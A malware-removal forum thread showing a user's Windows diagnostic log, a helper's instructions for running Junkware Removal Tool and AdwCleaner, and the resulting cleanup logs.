64 Bit HP CIO Components Installer (Version: 1.2.0 - Hewlett-Packard) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 15.0.0.293 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
AGEIA PhysX v6.10.25 (HKLM-x32\...\{7104189A-C592-4A56-AC9E-7C0CA135DA3C}) (Version: 6.10.25 - AGEIA Technologies, Inc.)
AI Manager (HKLM-x32\...\{4AF95DE2-B54D-4C3F-9494-FD3B558E2C2D}) (Version: 1.08.07 - ASUSTeK)
AMD USB Filter Driver (x32 Version: 1.0.15.94 - Advanced Micro Devices, Inc.) Hidden
ASUS Backup Wizard (HKLM-x32\...\{124C9BD0-8C52-40AB-8238-0605703B1C28}) (Version: 1.00.09 - ASUSTeK Computer Inc.)
ASUS PCE-N10 WLAN Card Utilities & Driver (HKLM-x32\...\{556BEFE2-30FF-4113-98F4-01234396DF2B}) (Version: 1.0.0.9 - )
ASUS PCE-N53 WLAN Card Utilities & Driver (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 1.0.0.8 - ASUS)
ASUS VIBE (HKLM-x32\...\ASUS VIBE) (Version: 1.0.188 - Ecareme, Inc.)
ASUSUpdate (HKLM-x32\...\{587178E7-B1DF-494E-9838-FA4DD36E873C}) (Version: 7.18.03 - ASUSTeK Computer Inc.)
ATI Catalyst Install Manager (HKLM\...\{0C798FBB-2BA6-D113-C055-936965550F33}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Avira (HKLM-x32\...\{dc9a688a-12cb-4a22-b449-23d849d01dc7}) (Version: 1.1.24.28609 - Avira Operations GmbH & Co. KG)
Avira (x32 Version: 1.1.24.28609 - Avira Operations GmbH & Co. KG) Hidden
Avira Free Antivirus (HKLM-x32\...\Avira AntiVir Desktop) (Version: 14.0.7.306 - Avira)
Best Buy pc app (Version: 3.1.1.0 - Best Buy) Hidden
Best Buy pc app (x32 Version: 3.1.1.0 - Best Buy) Hidden
bl (x32 Version: 1.0.0 - Your Company Name) Hidden
Brother HL-2040 (HKLM-x32\...\{03F595F6-B733-4A29-86BC-7C055D977D7C}) (Version: 1.00 - Brother)
ccc-core-static (x32 Version: 2010.0210.2206.39615 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.19 - Piriform)
CDisplayEx 1.10.29 (HKLM\...\CDisplayEx_is1) (Version: - Progdigy Software S.A.R.L.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DjVuLibre DjView 3.5.25.4+4.9.2 (HKLM-x32\...\DjVuLibre+DjView) (Version: 3.5.25.4+4.9.2 - DjVuZone)
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
ImagXpress (x32 Version: 7.0.74.0 - Nero AG) Hidden
LogixPro-500 PLC Simulator (HKLM-x32\...\LogixPro 500 PLC Simulator_is1) (Version: - TheLearningPit)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft PowerPoint Viewer (HKLM-x32\...\{95140000-00AF-0409-0000-0000000FF1CE}) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 33.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 33.0 (x86 en-US)) (Version: 33.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB973685) (HKLM-x32\...\{859DFA95-E4A6-48CD-B88E-A3E483E89B44}) (Version: 4.30.2107.0 - Microsoft Corporation)
neroxml (x32 Version: 1.0.0 - Nero AG) Hidden
ph (x32 Version: 1.0.0 - Your Company Name) Hidden
Photo Common (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Platform (x32 Version: 1.34 - VIA Technologies, Inc.) Hidden
PxMergeModule (x32 Version: 1.00.0000 - Your Company Name) Hidden
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
RangeMax Wireless-N USB Adapter WN111v2 (HKLM-x32\...\InstallShield_{1C0E9C6B-D4D5-4D3C-8A10-F10A3E7BEEA5}) (Version: 3.0.0.3 - NETGEAR)
Readiris Pro 10 (HKLM-x32\...\{14D08502-FEE4-40E5-90D3-8A967A1D8BA2}) (Version: - )
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.88.617.2014 - Realtek)
Sansa Updater (HKCU\...\Sansa Updater) (Version: 1.407 - SanDisk Corporation)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.18 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.18.106 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
VIA Platform Device Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
WN111v2 (x32 Version: 3.0.0.3 - NETGEAR) Hidden
Ys Origin (HKLM-x32\...\Steam App 207350) (Version: - Nihon Falcom)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

==================== Restore Points =========================

26-10-2014 22:10:40 Scheduled Checkpoint
27-10-2014 07:47:54 avast! antivirus system restore point
27-10-2014 07:53:09 Removed GeekBuddy.
27-10-2014 08:32:06 Removed ebi.BookReader3J

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 19:34 - 2014-10-27 07:00 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {38B69515-75EE-45F7-AADF-BA4ECB7497EC} - System32\Tasks\Game_Booster_AutoUpdate => C:\Program Files (x86)\IObit\Game Booster 3\AutoUpdate.exe
Task: {4F7521E0-5030-4229-81A9-3C590C28B238} - System32\Tasks\ASUS\ASUS Update Checker => C:\Program Files (x86)\ASUS\ASUSUpdate\UpdateChecker\UpdateChecker.exe [2009-12-28] (ASUSTeK Computer Inc.)
Task: {5527822D-B79C-407A-A90B-8726D2CC0D34} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-17] (Google Inc.)
Task: {5DC93231-81D9-4BA6-9F03-8C1A0A73223B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-10-23] (Piriform Ltd)
Task: {AD27FE19-DD71-4A43-8B11-5116A7CE348F} - System32\Tasks\ASUS\ASUS RegRun Loader => C:\Program Files (x86)\ASUS\AASP\1.00.97\AsLoader.exe [2009-12-23] (ASUSTeK Computer Inc.)
Task: {B20A35D4-ADE1-4EAD-9C5E-5C68779655B7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-17] (Google Inc.)
Task: {DAF6AA24-3111-4D7D-BA1C-EB27CF111CC9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-10-20] (Adobe Systems Incorporated)
Task: {DFC4F727-6E50-455B-A97E-BC10E69CFFE0} - System32\Tasks\{512B4F1F-A37C-4F6C-8D18-466D7A964A4D} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2014-07-24] (Skype Technologies S.A.)
Task: {F82B5156-20D3-41D7-B836-D98942D48ABA} - System32\Tasks\ASUS\AsBackupWizard_Run => C:\Program Files (x86)\ASUS\AsBackupWizard\AsRunBkWizardHelper.exe [2010-04-23] (ASUSTeK Computer Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2011-06-14 23:02 - 2008-11-11 05:23 - 00027648 _____ () C:\Windows\System32\sso2ml6.dll
2013-03-14 09:38 - 2012-03-21 06:48 - 00184320 _____ () C:\Program Files (x86)\ASUS\PCE-N53 WLAN Card Utilities\Common\ASUSService.exe

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:5C321E34
AlternateDataStreams: C:\ProgramData\TEMP:F25DDE13
AlternateDataStreams: C:\Users\McLain\Local Settings:f086wSl4AGfGJDPZoQwtRUAX3
AlternateDataStreams: C:\Users\McLain\AppData\Local:f086wSl4AGfGJDPZoQwtRUAX3
AlternateDataStreams: C:\Users\McLain\AppData\Local\Application Data:f086wSl4AGfGJDPZoQwtRUAX3

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: AMD External Events Utility => 2
MSCONFIG\Services: Device Handle Service => 2
MSCONFIG\Services: GeekBuddyRSP => 2
MSCONFIG\Services: jswpsapi => 3
MSCONFIG\Services: RalinkRegistryWriter => 2
MSCONFIG\Services: RealtekSE => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ASUS PCE-N53 WLAN Control Center.lnk => C:\Windows\pss\ASUS PCE-N53 WLAN Control Center.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^NETGEAR WN111v2 Smart Wizard.lnk => C:\Windows\pss\NETGEAR WN111v2 Smart Wizard.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Start GeekBuddy.lnk => C:\Windows\pss\Start GeekBuddy.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS6ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: HDAudDeck => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
MSCONFIG\startupreg: Logitech Download Assistant => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RunAIShell => C:\Program Files (x86)\ASUS\AI Manager\AsShellApplication.exe
MSCONFIG\startupreg: SansaDispatch => C:\Users\McLain\AppData\Roaming\SanDisk\Sansa Updater\SansaDispatch.exe
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
MSCONFIG\startupreg: tvncontrol => "C:\Program Files (x86)\Common Files\COMODO\GeekBuddyRSP.exe" -controlservice -slave

========================= Accounts: ==========================

Administrator (S-1-5-21-1721771813-3942891954-2793525010-500 - Administrator - Disabled)
Guest (S-1-5-21-1721771813-3942891954-2793525010-501 - Limited - Disabled)
McLain (S-1-5-21-1721771813-3942891954-2793525010-1001 - Administrator - Enabled) => C:\Users\McLain

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (10/27/2014 06:55:12 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: The server name or address could not be resolved

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description: The index cannot be initialized.

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: The application cannot be initialized.

Context: Windows Application

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3028) (User: )
Description: The gatherer object cannot be initialized.

Context: Windows Application, SystemIndex Catalog

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: The plug-in in <Search.TripoliIndexer> cannot be initialized.

Context: Windows Application, SystemIndex Catalog

Details:
   Element not found. (HRESULT : 0x80070490) (0x80070490)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: The plug-in in <Search.JetPropStore> cannot be initialized.

Context: Windows Application, SystemIndex Catalog

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 9002) (User: )
Description: The Windows Search Service cannot load the property store information.

Context: Windows Application, SystemIndex Catalog

Details:
   The content index database is corrupt. (HRESULT : 0xc0041800) (0xc0041800)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description: The Windows Search Service is being stopped because there is a problem with the indexer: The catalog is corrupt.

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 7040) (User: )
Description: The search service has detected corrupted data files in the index {id=4700}. The service will attempt to automatically correct this problem by rebuilding the index.

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 9000) (User: )
Description: The Windows Search Service cannot open the Jet property store.

Details:
   0x%08x (0xc0041800 - The content index database is corrupt. (HRESULT : 0xc0041800))

System errors:
=============
Error: (10/27/2014 01:53:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DgiVecp service failed to start due to the following error:
%%20

Error: (10/27/2014 07:01:01 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.

Error: (10/27/2014 07:00:29 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\ComboFix\catchme.sys has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.

Error: (10/27/2014 07:00:28 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\ComboFix\catchme.sys has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.

Error: (10/27/2014 06:56:19 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.

Error: (10/27/2014 06:50:00 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The ASUSWireless service terminated unexpectedly. It has done this 1 time(s).

Error: (10/27/2014 06:45:52 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/27/2014 06:44:59 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The DgiVecp service failed to start due to the following error:
%%20

Error: (10/27/2014 01:51:43 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/27/2014 01:51:04 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.

Microsoft Office Sessions:
=========================
Error: (10/27/2014 06:55:12 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: (Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: The server name or address could not be resolved

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description:
Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: Context: Windows Application

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3028) (User: )
Description: Context: Windows Application, SystemIndex Catalog

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: Context: Windows Application, SystemIndex Catalog

Details:
   Element not found. (HRESULT : 0x80070490) (0x80070490)
Search.TripoliIndexer

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: Context: Windows Application, SystemIndex Catalog

Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Search.JetPropStore

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 9002) (User: )
Description: Context: Windows Application, SystemIndex Catalog

Details:
   The content index database is corrupt. (HRESULT : 0xc0041800) (0xc0041800)

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description:
Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
The catalog is corrupt

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 7040) (User: )
Description:
Details:
   The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
4700

Error: (10/27/2014 01:51:04 AM) (Source: Windows Search Service) (EventID: 9000) (User: )
Description:
Details:
   0x%08x (0xc0041800 - The content index database is corrupt. (HRESULT : 0xc0041800))

CodeIntegrity Errors:
===================================
Date: 2014-10-27 07:00:29.546
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-10-27 07:00:29.249
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-10-27 07:00:28.953
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-10-27 07:00:28.657
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-10-21 00:09:13.516
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-10-21 00:09:13.235
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: AMD Phenom II X4 830 Processor
Percentage of memory in use: 24%
Total physical RAM: 5887.18 MB
Available physical RAM: 4458.29 MB
Total Pagefile: 11772.53 MB
Available Pagefile: 10202.23 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: (WIN7) (Fixed) (Total:917.33 GB) (Free:162.6 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: CB5BD2B2)
Partition 1: (Not Active) - (Size=14.2 GB) - (Type=1B)
Partition 2: (Active) - (Size=917.3 GB) - (Type=07 NTFS)

==================== End Of Log ============================

Naathim · October 27, 2014

OK, let's keep on moving.

Fix with Junkware Removal Tool

Please download JRT by Thisisu and save the file to your desktop.
Temporary disable your AntiVirus and AntiSpyware protection - instructions here.

Right-click on icon and select Run as Administrator to start the tool.
Follow the prompts and let this process run uninterrupted.
This scan can take a while, depending on your System specs.
Upon completion, a log (JRT.txt) will open on your desktop.

Please include the contents of that file in your reply.
Do not forget to re-enable your previously switched off protection software!
Please also manually reboot your machine after this procedure.

Fix with AdwCleaner

Please download AdwCleaner by Xplode and save the file to your desktop.

Right-click on icon and select Run as Administrator to start the tool.
The program will begin to update the database (if internet connection is operational). Please wait a little bit.
Follow the prompts and click Scan.
When finished, please click Clean.
Upon completion, click Report. A log (AdwCleaner[s*].txt) will open.

Please include the contents of that file in your reply.

bmclain · October 27, 2014

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.3 (10.21.2014:1)
OS: Windows 7 Home Premium x64
Ran by McLain on Mon 10/27/2014 at 14:36:16.51
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~ Services

~~~ Registry Values

~~~ Registry Keys

~~~ Files

~~~ Folders

~~~ FireFox

Successfully deleted the following from C:\Users\McLain\AppData\Roaming\mozilla\firefox\profiles\iaxa0uvq.default-1353978850101\prefs.js

user_pref("browser.uiCustomization.state", "{\"placements\":{\"PanelUI-contents\":[\"edit-controls\",\"zoom-controls\",\"new-window-button\",\"privatebrowsing-button\",\"save-
Emptied folder: C:\Users\McLain\AppData\Roaming\mozilla\firefox\profiles\iaxa0uvq.default-1353978850101\minidumps [1 files]

~~~ Event Viewer Logs were cleared

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Mon 10/27/2014 at 14:37:58.70
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# AdwCleaner v4.002 - Report created 27/10/2014 at 14:54:49
# DB v2014-10-26.6
# Updated 27/10/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : McLain - MCLAIN-PC
# Running from : C:\Users\McLain\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17344

-\\ Mozilla Firefox v33.0 (x86 en-US)

-\\ Google Chrome v

*************************

AdwCleaner[R0].txt - [9367 octets] - [20/10/2014 21:51:41]
AdwCleaner[R1].txt - [9427 octets] - [20/10/2014 21:58:41]
AdwCleaner[R2].txt - [930 octets] - [20/10/2014 22:20:07]
AdwCleaner[R3].txt - [987 octets] - [20/10/2014 23:51:36]
AdwCleaner[R4].txt - [5886 octets] - [25/10/2014 00:08:19]
AdwCleaner[R5].txt - [1300 octets] - [27/10/2014 14:46:17]
AdwCleaner[s0].txt - [9455 octets] - [20/10/2014 22:02:20]
